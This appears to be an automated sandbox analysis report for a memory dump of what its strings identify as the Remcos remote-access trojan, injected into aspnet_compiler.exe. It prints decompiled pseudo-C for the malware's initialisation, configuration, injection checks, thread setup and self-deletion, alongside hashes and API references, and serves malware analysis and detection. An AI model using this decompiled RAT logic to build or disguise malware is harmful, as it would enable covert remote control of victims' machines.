                • Instruction Fuzzy Hash: 1F01FF7290011DABCB04EBD5DC45ADEB7BCEF44319F10016AB505B61D1EEB86A89CB98
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: recv
                • String ID:
                • API String ID: 1507349165-0
                • Opcode ID: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                • Instruction ID: 746b65c02e61119df28bf9f7234443caa874ec4429a0c44ab9f61596d4479e10
                • Opcode Fuzzy Hash: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                • Instruction Fuzzy Hash: 96B092B9108202FFCA160B60DD0887A7EAAABC8381F008A2CF186411B1C636C451AB26
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00433452() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E0043345E); // executed
                				return _t1;
                			}





                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0003345E,00433185), ref: 00433457
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                • Instruction ID: 3c5ffc1f6ca5581617dc18551564c5a1f11bccfc48c0ed950457c3a26c38d402
                • Opcode Fuzzy Hash: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 91%
                			E0040DEC9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
                				char _v524;
                				char _v700;
                				char _v720;
                				char _v724;
                				char _v728;
                				char _v752;
                				char _v756;
                				char _v760;
                				char _v772;
                				struct _SECURITY_ATTRIBUTES* _v776;
                				char _v780;
                				char _v784;
                				intOrPtr _v796;
                				intOrPtr _v812;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t76;
                				void* _t79;
                				char* _t94;
                				void* _t95;
                				struct _SECURITY_ATTRIBUTES* _t97;
                				struct _SECURITY_ATTRIBUTES* _t98;
                				struct _SECURITY_ATTRIBUTES* _t100;
                				void* _t116;
                				void* _t117;
                				void* _t124;
                				char _t130;
                				struct _SECURITY_ATTRIBUTES** _t135;
                				signed char* _t140;
                				void* _t143;
                				void* _t145;
                				void* _t158;
                				struct _SECURITY_ATTRIBUTES* _t161;
                				intOrPtr _t163;
                				struct _SECURITY_ATTRIBUTES* _t164;
                				struct _SECURITY_ATTRIBUTES* _t171;
                				WCHAR* _t179;
                				struct _SECURITY_ATTRIBUTES* _t180;
                				intOrPtr _t194;
                				intOrPtr* _t197;
                				void* _t199;
                				void* _t204;
                				char* _t207;
                				void* _t209;
                				void* _t217;
                				void* _t223;
                				void* _t224;
                				signed int _t225;
                				char* _t232;
                				void* _t234;
                				intOrPtr* _t243;
                				void* _t245;
                				intOrPtr* _t253;
                				void* _t255;
                				struct _SECURITY_ATTRIBUTES* _t273;
                				void* _t286;
                				struct _SECURITY_ATTRIBUTES* _t287;
                				struct _SECURITY_ATTRIBUTES* _t297;
                				intOrPtr* _t305;
                				void* _t324;
                				char* _t382;
                				signed int _t414;
                				signed int _t418;
                				char _t420;
                				void* _t423;
                				void* _t479;
                				void* _t496;
                				struct _SECURITY_ATTRIBUTES* _t497;
                				intOrPtr _t498;
                				char* _t503;
                				intOrPtr* _t505;
                				void* _t508;
                				void* _t509;
                				struct _SECURITY_ATTRIBUTES* _t510;
                				void* _t511;
                				void* _t514;
                				signed int _t517;
                				signed int _t519;
                				void* _t522;
                				void* _t523;
                				void* _t524;
                				void* _t526;
                				void* _t527;
                				void* _t528;
                				void* _t529;
                				void* _t530;
                				void* _t531;
                				void* _t535;
                				void* _t537;
                
                				_t537 = __eflags;
                				_t479 = __edx;
                				_t517 = _t519;
                				 *0x470d40 = _a4;
                				_push(_t286);
                				E0041B4C9();
                				_t497 = 0;
                				GetModuleFileNameW(0, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", 0x104);
                				E0040E8E0( &_v724, _t479, _t537);
                				_t522 = (_t519 & 0xfffffff8) - 0x2f4;
                				E004020D6(_t286, _t522, _t479, _t537, 0x4732bc);
                				_t523 = _t522 - 0x18;
                				E004020D6(_t286, _t523, _t479, _t537,  &_v728);
                				_t76 = E0041A976( &_v756, _t479); // executed
                				_t524 = _t523 + 0x30;
                				E0040F05A(_t479, _t76);
                				E00401E6D( &_v760, _t479);
                				_t79 = E0043E5D0(_a12, "-l");
                				_t305 = _t496;
                				if(_t79 != 0) {
                					_t287 = 3;
                					_t501 = 0x473298;
                					__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t479, _t517, __eflags, _t287))));
                					 *0x470b32 = __eflags != 0;
                					_t481 = E004052FE( &_v780, "Software\\", _t517, E00401E45(0x473298, _t479, _t517, __eflags, 0xe));
                					E00401FC2(0x473238, _t83, 0x473298, E00408832(_t287,  &_v756, _t83, 0, _t517, __eflags, "\\"));
                					E00401FB8();
                					E00401FB8();
                					E00401FA0(0x473268, E00401E45(0x473298, _t83, _t517, __eflags, 0xe));
                					L00405A86(_t287, 0x4732d4, _t83, "Exe");
                					E00401E45(0x473298, _t83, _t517, __eflags, 0x32);
                					__eflags =  *((char*)(E004051C3(0)));
                					 *0x470d4b = __eflags != 0;
                					E00401E45(0x473298, _t83, _t517, __eflags, 0x33);
                					_t94 = E004051C3(0);
                					__eflags =  *_t94;
                					 *0x470d60 =  *_t94 != 0;
                					__eflags =  *0x470d4b;
                					if(__eflags == 0) {
                						L5:
                						_v776 = _t497;
                						_t95 = E00401E45(_t501, _t481, _t517, __eflags, 0xd);
                						_t482 = "0";
                						_t324 = _t95;
                						__eflags = E0040AF37(__eflags);
                						if(__eflags != 0) {
                							_t514 = OpenMutexA(0x100000, _t497, E00401F8B(E00401E45(_t501, "0", _t517, __eflags, 7)));
                							__eflags = _t514;
                							if(_t514 != 0) {
                								WaitForSingleObject(_t514, 0xea60);
                								CloseHandle(_t514);
                							}
                							_t482 = E00401F8B(0x473238);
                							_t273 = E00412831(_t272, "Inj",  &_v776);
                							_pop(_t324);
                							__eflags = _t273;
                							if(_t273 != 0) {
                								_t482 = E00401F8B(0x473238);
                								E00412C91(_t274, __eflags, "Inj");
                								_pop(_t324);
                							}
                							_t501 = 0x473298;
                						}
                						_t97 = E0040C577();
                						__eflags = _t97;
                						if(_t97 != 0) {
                							_t98 =  *0x472adc;
                							__eflags = _t98;
                							if(__eflags != 0) {
                								_t98->nLength(); // executed
                							}
                							E00419E1E(_t324, __eflags); // executed
                							_t100 =  *0x472ae8;
                							__eflags = _t100;
                							if(_t100 != 0) {
                								 *0x46f9d0 = _t100->nLength();
                							}
                							__eflags = _v776 - _t497;
                							if(__eflags == 0) {
                								__eflags = E00406D8A(_t324);
                								if(__eflags != 0) {
                									E00406DAC();
                									E004068D4(_t501);
                								}
                								__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x2e))));
                								if(__eflags != 0) {
                									__eflags =  *0x472ae8 - _t497;
                									if(__eflags != 0) {
                										__eflags =  *0x46f9d0 - _t497; // 0x1
                										if(__eflags == 0) {
                											E004068D4(_t501);
                										}
                									}
                								}
                							}
                							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x27))));
                							if(__eflags != 0) {
                								E00406DC9();
                							}
                							L004086CB(_t287, 0x473208, _t482, E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xb)));
                							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 4))));
                							 *0x470b33 = __eflags != 0;
                							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 5))));
                							 *0x470b30 = __eflags != 0;
                							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 8))));
                							 *0x470b31 = __eflags != 0;
                							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, _t287))));
                							if(__eflags != 0) {
                								__eflags = E0043A3D6(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x30)));
                								if(__eflags != 0) {
                									_t253 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
                									_t255 = E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30));
                									_t482 =  *_t253;
                									E00401EF3(0x473250,  *_t253, _t253, E0040CF38( &_v780,  *_t253, _t255));
                									E00401EE9();
                									_t501 = 0x473298;
                								}
                							}
                							__eflags = _v776 - _t497;
                							if(_v776 != _t497) {
                								E00435760(_t497,  &_v524, _t497, 0x208);
                								_t288 = 0x473280;
                								_t116 = E0040245C();
                								_t117 = E00401F8B(0x473280);
                								_t483 = E00401F8B(0x473238);
                								E004129E0(_t119, "exepath",  &_v524, 0x208, _t117, _t116);
                								_t526 = _t524 + 0x20;
                								L004086CB(0x473280, 0x473220, _t119,  &_v524);
                								_t503 = 0x473298;
                								goto L42;
                							} else {
                								__eflags =  *0x470b32;
                								if(__eflags == 0) {
                									L004086CB(_t287, 0x473220, _t482, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
                								} else {
                									E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x1e));
                									_t297 =  *((intOrPtr*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xc))));
                									_t243 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
                									__eflags = _t297;
                									_t501 = _t243;
                									__eflags = _t297;
                									_t245 = E00401F8B(E00401E45(0x473298, _t482, _t517, _t297, 0xa));
                									E0040C307( *_t243, E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30)), __eflags, _t245, ((_t242 & 0xffffff00 | _t297 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t242 & 0xffffff00 | _t297 != 0x00000000) & 0x000000ff);
                									_t524 = _t524 + 0xc;
                								}
                								_t217 = E0040245C();
                								_t423 = 2;
                								_t294 =  ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220;
                								_push( ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220);
                								_t510 = E004330A3(_t423, (_t217 + 1) * 0x473220 >> 0x20, _t501, __eflags);
                								__eflags = _t510;
                								if(_t510 == 0) {
                									_t510 = _t497;
                								} else {
                									E00435760(_t497, _t510, _t497, _t294);
                									_t524 = _t524 + 0xc;
                								}
                								E0043E0D9(_t510, E00401EE4(0x473220));
                								_t288 = 0x473280;
                								_t223 = E0040245C();
                								_t224 = E00401F8B(0x473280);
                								_t225 = E0040245C();
                								E00412C2F(E00401F8B(0x473238), __eflags, "exepath", _t510, 2 + _t225 * 2, _t224, _t223); // executed
                								E004330AC(_t510);
                								_t526 = _t524 + 0x1c;
                								_t503 = 0x473298;
                								E00401E45(0x473298, _t227, _t517, __eflags, 0xd);
                								_t483 = "0";
                								__eflags = E0040AF37(__eflags);
                								if(__eflags == 0) {
                									L42:
                									_push(1);
                									_t124 = E00401F8B(E00401E45(_t503, _t483, _t517, __eflags, 0x34));
                									_t527 = _t526 - 0x18;
                									E00402073(_t288, _t527, _t483, _t517, _t124);
                									_push("licence");
                									_t484 = E00401F8B(0x473238); // executed
                									E00412A57(0x473238, _t126); // executed
                									_t528 = _t527 + 0x20;
                									_t130 = E0043A3AC(_t128, E00401F8B(E00401E45(_t503, _t126, _t517, __eflags, 0x28)));
                									 *0x470d48 = _t130;
                									__eflags = _t130 - 2;
                									if(_t130 != 2) {
                										__eflags = _t130 - 1;
                										if(_t130 != 1) {
                											_t498 = CreateThread;
                										} else {
                											_t420 = 0;
                											goto L44;
                										}
                									} else {
                										_t420 = 1;
                										L44:
                										E0041B6A6(_t288, _t420, _t484, _t497);
                										_t498 = __imp__CreateThread; // 0x747143e0
                										CreateThread(_t497, _t497, E0041BD68, _t497, _t497, _t497);
                									}
                									_t529 = _t528 - 0x18;
                									E00402073(_t288, _t529, _t484, _t517, "Remcos Agent initialized");
                									_t530 = _t529 - 0x18;
                									E00402073(_t288, _t530, _t484, _t517, "i");
                									E0041A04A(_t288, _t498);
                									_t531 = _t530 + 0x30;
                									_t135 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x37));
                									_v796 =  *((intOrPtr*)(E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x10))));
                									_t140 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0xf));
                									__eflags =  *_t135;
                									_t504 = _t140;
                									_t143 = E0043A3AC(_t141, E00401F8B(E00401E45(0x473298, _t484, _t517,  *_t135, 0x36)));
                									_t145 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x11));
                									E0040949A(0x473298, _t498, __eflags,  *_t140 & 0x000000ff, _v812, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x31)), _t145, _t143, (_t139 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x14)))) - 1;
                									if(__eflags != 0) {
                										_t287 = 0;
                										__eflags = 0;
                									} else {
                										_t209 = 2;
                										_t509 = E00432DF5(_t484, _t504, __eflags, _t209);
                										_t287 = 0;
                										 *_t509 = 0;
                										_t418 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
                										__eflags =  *(E00401F8B(_t418));
                										 *((char*)(_t509 + 1)) = _t418 & 0xffffff00 | __eflags != 0x00000000;
                										CreateThread(0, 0, E00418B0F, _t509, 0, 0);
                									}
                									_t501 = 0x473298;
                									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x16)))) - 1;
                									if(__eflags == 0) {
                										_t204 = 2;
                										_t508 = E00432DF5(_t484, 0x473298, __eflags, _t204);
                										 *_t508 = 1;
                										_t414 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
                										_t207 = E00401F8B(_t414);
                										__eflags =  *_t207;
                										_t49 =  *_t207 != 0;
                										__eflags = _t49;
                										 *((char*)(_t508 + 1)) = _t414 & 0xffffff00 | _t49;
                										CreateThread(_t287, _t287, E00418B0F, _t508, _t287, _t287);
                										_t501 = 0x473298;
                									}
                									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x23)))) - 1;
                									if(__eflags == 0) {
                										 *0x470a85 = 1;
                										_t197 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x25));
                										_t199 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x26));
                										_t484 =  *_t197;
                										E00401EF3(0x472d40,  *_t197, _t197, E0040CEEC( &_v780,  *_t197, _t199));
                										E00401EE9();
                										CreateThread(_t287, _t287, E00401BC9, _t287, _t287, _t287);
                										_t501 = 0x473298;
                									}
                									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2b)))) - 1;
                									if(__eflags == 0) {
                										_t501 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2c));
                										_t194 = E0043A3AC(_t192, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x2d)));
                										__eflags =  *_t501;
                										_t484 = _t194;
                										__eflags =  *_t501 != 0;
                										E0040B6DC(_t194);
                									}
                									_t158 = E0041A168( &_v772, _t484, _t498, __eflags); // executed
                									E00401EF3(0x4732a4, _t484, _t501, _t158);
                									E00401EE9();
                									_t161 =  *0x472ae0;
                									__eflags = _t161;
                									if(_t161 != 0) {
                										_t161->nLength(_t287); // executed
                									}
                									CreateThread(_t287, _t287, E0040ECEA, _t287, _t287, _t287); // executed
                									__eflags =  *0x470d4b;
                									if( *0x470d4b != 0) {
                										CreateThread(_t287, _t287, E0041163A, _t287, _t287, _t287);
                									}
                									__eflags =  *0x470d60;
                									if( *0x470d60 != 0) {
                										CreateThread(_t287, _t287, E00411C1E, _t287, _t287, _t287);
                									}
                									_t163 =  *0x46f9d0; // 0x1
                									_t164 = _t163 - _t287;
                									__eflags = _t164;
                									if(__eflags == 0) {
                										_push("User");
                										goto L67;
                									} else {
                										__eflags = _t164 - 1;
                										if(__eflags == 0) {
                											_push("Administrator");
                											L67:
                											E004052DD(_t287, _t531 - 0x18, "Access Level: ", _t517, __eflags, E00402073(_t287,  &_v776, _t484, _t517));
                											E00402073(_t287, _t531 - 4, "Access Level: ", _t517, "i");
                											E0041A04A(_t287, _t498);
                											E00401FB8();
                										}
                									}
                									_t497 = 0x473238;
                									_t171 = E004127E7(0x473238, E00401F8B(0x473238), "del"); // executed
                									_pop(_t382);
                									__eflags = _t171;
                									if(__eflags != 0) {
                										E00412903( &_v752, 0x80000001, E00401EE4(E0041A7B9( &_v776, 0x473238)), L"del");
                										E00401EE9();
                										_t179 = E00401EE4( &_v752);
                										_t501 = DeleteFileW;
                										while(1) {
                											_t180 = DeleteFileW(_t179);
                											__eflags = _t180;
                											if(_t180 != 0) {
                												break;
                											}
                											__eflags = _t287 - 0xa;
                											if(_t287 < 0xa) {
                												_t287 =  &(_t287->nLength);
                												__eflags = _t287;
                												Sleep(0xa);
                												_t179 = E00401EE4( &_v752);
                												continue;
                											}
                											goto L75;
                										}
                										goto L75;
                									}
                									goto L76;
                								} else {
                									_t232 = E00401E45(0x473298, "0", _t517, __eflags, 0xd);
                									_t535 = _t526 - 0x18;
                									_t483 = _t232;
                									E0041A7B9(_t535, _t232);
                									_t234 = E0040E991(__eflags);
                									_t526 = _t535 + 0x18;
                									__eflags = _t234 - 1;
                									if(__eflags != 0) {
                										goto L42;
                									} else {
                										_push(3);
                										goto L39;
                									}
                								}
                							}
                						} else {
                							_push(2);
                							L39:
                							_pop(_t511);
                							goto L40;
                						}
                					} else {
                						E00401FC2(0x473370, 0x473268, 0x473298, E00406292( &_v772, 0x473268, _t517, "-W"));
                						E00401FB8();
                						_v784 = 0;
                						_t481 = E00401F8B(0x473238);
                						__eflags = E00412831(_t282, "WD",  &_v784);
                						if(__eflags != 0) {
                							E00412C91(E00401F8B(0x473238), __eflags, "WD");
                							E004119B8();
                							L75:
                							E00412D0B(0x80000001, E00401EE4(E0041A7B9( &_v776, _t497)), L"del");
                							E00401EE9();
                							_t382 =  &_v752;
                							E00401EE9(); // executed
                							L76:
                							E0040D246(__eflags); // executed
                							E00414271(); // executed
                							asm("int3");
                							_push(_t501);
                							_t505 = _t382 + 0x68;
                							E0040F0C7(_t287, _t505, _t505);
                							_t305 = _t505;
                							 *_t305 = 0x465554;
                							 *_t305 = 0x465510;
                							return E00434069(_t305);
                						} else {
                							goto L5;
                						}
                					}
                				} else {
                					_push(__ecx);
                					_push(__ecx);
                					__ecx =  &_v700;
                					__eax = E0040F0F6( &_v700, __edx, __eflags, "license_code.txt", 2);
                					__ecx = 0x473298;
                					__ecx = E00401E45(0x473298, __edx, __ebp, __eflags, 0x34);
                					__edx = __eax;
                					__ecx =  &_v720;
                					__eax = E0041047A( &_v720, __edx, __eflags);
                					__ecx =  &_v720;
                					__eax = E0040F0A7( &_v720, __edx, __eflags);
                					__ecx =  &_v720;
                					L77();
                					0 = 1;
                					L40:
                					E00401FB8();
                					return _t511;
                				}
                			}


                APIs
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B501
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B516
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B543
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B593
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 0040DEF2
                • OpenMutexA.KERNEL32 ref: 0040E0E6
                  • Part of subcall function 0041047A: __EH_prolog.LIBCMT ref: 0041047F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologMutexNameOpen
                • String ID: 2G$ 2G$ 2G$ 2G$ 2G$82G$82G$82G$82G$82G$82G$82G$82G$@-G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Exe$Inj$P2G$Remcos Agent initialized$Software\$User$del$del$exepath$h2G$h2G$licence$license_code.txt$p3G$Cqt
                • API String ID: 1897280938-2901791990
                • Opcode ID: 39ffb3baf458eec66fc9998632b3f73d0fd22f7ba3a45d8b3a70bcdc926ec4fd
                • Instruction ID: 9e1fa40da8247c9b585ea9a59a3a54fb039144435d37588c5c456d259acc364f
                • Opcode Fuzzy Hash: 39ffb3baf458eec66fc9998632b3f73d0fd22f7ba3a45d8b3a70bcdc926ec4fd
                • Instruction Fuzzy Hash: 3532E670B0434167DA14BB729C57B6E26998F81708F04487FB946BB2E3EE7C8D45839E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 89%
                			E00414271() {
                				char _v16;
                				char _v40;
                				char _v64;
                				char _v76;
                				char _v100;
                				char _v124;
                				char _v136;
                				void* _v159;
                				char _v160;
                				char _v184;
                				char _v208;
                				char _v232;
                				char _v256;
                				char _v280;
                				char _v304;
                				char _v328;
                				char _v352;
                				char _v376;
                				char _v400;
                				char _v424;
                				char _v448;
                				char _v472;
                				char _v496;
                				char _v520;
                				char _v544;
                				char _v568;
                				char _v592;
                				char _v616;
                				char _v640;
                				char _v664;
                				char _v688;
                				char _v712;
                				char _v736;
                				char _v760;
                				char _v784;
                				char _v808;
                				char _v832;
                				char _v856;
                				char _v880;
                				char _v904;
                				char _v928;
                				char _v952;
                				char _v976;
                				char _v1000;
                				char _v1024;
                				char _v1048;
                				char _v1072;
                				char _v1096;
                				char _v1120;
                				char _v1144;
                				char _v1168;
                				char _v1192;
                				char _v1216;
                				char _v1240;
                				char _v1264;
                				char _v1288;
                				char _v1312;
                				char _v1336;
                				char _v1360;
                				char _v1384;
                				char _v1408;
                				char _v1432;
                				char _v1456;
                				char _v1480;
                				char _v1504;
                				char _v1528;
                				char _v1552;
                				char _v1576;
                				char _v2580;
                				signed int _t177;
                				void* _t179;
                				long _t184;
                				void* _t186;
                				void* _t189;
                				void* _t197;
                				char* _t208;
                				void* _t210;
                				void* _t211;
                				struct _SECURITY_ATTRIBUTES* _t212;
                				struct _SECURITY_ATTRIBUTES* _t214;
                				void* _t216;
                				long _t221;
                				void* _t222;
                				void* _t223;
                				void* _t237;
                				void* _t245;
                				void* _t246;
                				struct _SECURITY_ATTRIBUTES* _t249;
                				intOrPtr* _t252;
                				void* _t255;
                				void* _t258;
                				void* _t259;
                				void* _t260;
                				void* _t263;
                				void* _t265;
                				void* _t268;
                				void* _t269;
                				void* _t270;
                				void* _t271;
                				void* _t273;
                				void* _t274;
                				void* _t275;
                				intOrPtr* _t379;
                				void* _t395;
                				void* _t401;
                				void* _t403;
                				void* _t405;
                				void* _t407;
                				char* _t409;
                				long _t413;
                				void* _t414;
                				struct _SECURITY_ATTRIBUTES* _t415;
                				char* _t443;
                				char* _t487;
                				void* _t678;
                				void* _t690;
                				void* _t749;
                				signed short _t751;
                				void* _t760;
                				void* _t761;
                				void* _t762;
                				void* _t763;
                				void* _t764;
                				void* _t765;
                				void* _t766;
                				void* _t767;
                				void* _t768;
                				void* _t769;
                				void* _t770;
                				void* _t771;
                				void* _t775;
                				void* _t776;
                				void* _t777;
                				void* _t778;
                				void* _t779;
                				void* _t780;
                				void* _t781;
                				void* _t782;
                				void* _t783;
                				void* _t784;
                				long _t786;
                
                				_push(_t414);
                				_push(_t753);
                				E004020BF(_t414,  &_v100);
                				E0041A40E( &_v280, _t678);
                				E004020BF(_t414,  &_v1576);
                				_t749 = 0x473298;
                				_t177 = E0043A3AC(_t175, E00401F8B(E00401E45(0x473298, _t678, _t760, _t784, 0x29)));
                				if(_t177 != 0) {
                					_t413 = _t177 * 0x3e8;
                					_t786 = _t413;
                					Sleep(_t413);
                				}
                				_t762 = _t761 - 0x18;
                				E00402073(_t414, _t762, _t678, _t760, 0x46a630);
                				_t179 = E00401E45(_t749, _t678, _t760, _t786, 0);
                				_t763 = _t762 - 0x18;
                				E004020D6(_t414, _t763, _t678, _t786, _t179);
                				E0041A976( &_v76, _t678);
                				_t764 = _t763 + 0x30;
                				_t415 = 0; // executed
                				E0040487E(); // executed
                				E00401E45(_t749, _t678, _t760, _t786, 0x3a);
                				_t679 = 0x464074;
                				_t184 = E0040AF37(_t786);
                				_t787 = _t184;
                				if(_t184 != 0) {
                					E00401E45(_t749, 0x464074, _t760, _t787, 0x3a);
                					_t401 = E0040245C();
                					_t403 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x3a));
                					E00401E45(_t749, 0x464074, _t760, _t787, 0x39);
                					_t405 = E0040245C();
                					_t407 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x39));
                					E00401E45(_t749, 0x464074, _t760, _t787, 0x38);
                					_t409 = E0040245C();
                					_t753 = _t409;
                					E00401F8B(E00401E45(_t749, _t679, _t760, _t787, 0x38));
                					_t679 = _t409;
                					E0040471D(0, _t409, _t760, _t407, _t405, _t403, _t401);
                					_t764 = _t764 + 0x10;
                				}
                				L4:
                				_t765 = _t764 - 0x18;
                				 *0x473519 = 1;
                				E00402073(_t415, _t765, _t679, _t760, 0x46a634);
                				_t186 = E00401E45( &_v76, _t679, _t760, _t787, _t415);
                				_t766 = _t765 - 0x18;
                				E004020D6(_t415, _t766, _t679, _t787, _t186);
                				E0041A976( &_v16, _t679);
                				_t767 = _t766 + 0x30;
                				_t189 = E00401E45( &_v16, _t679, _t760, _t787, 1);
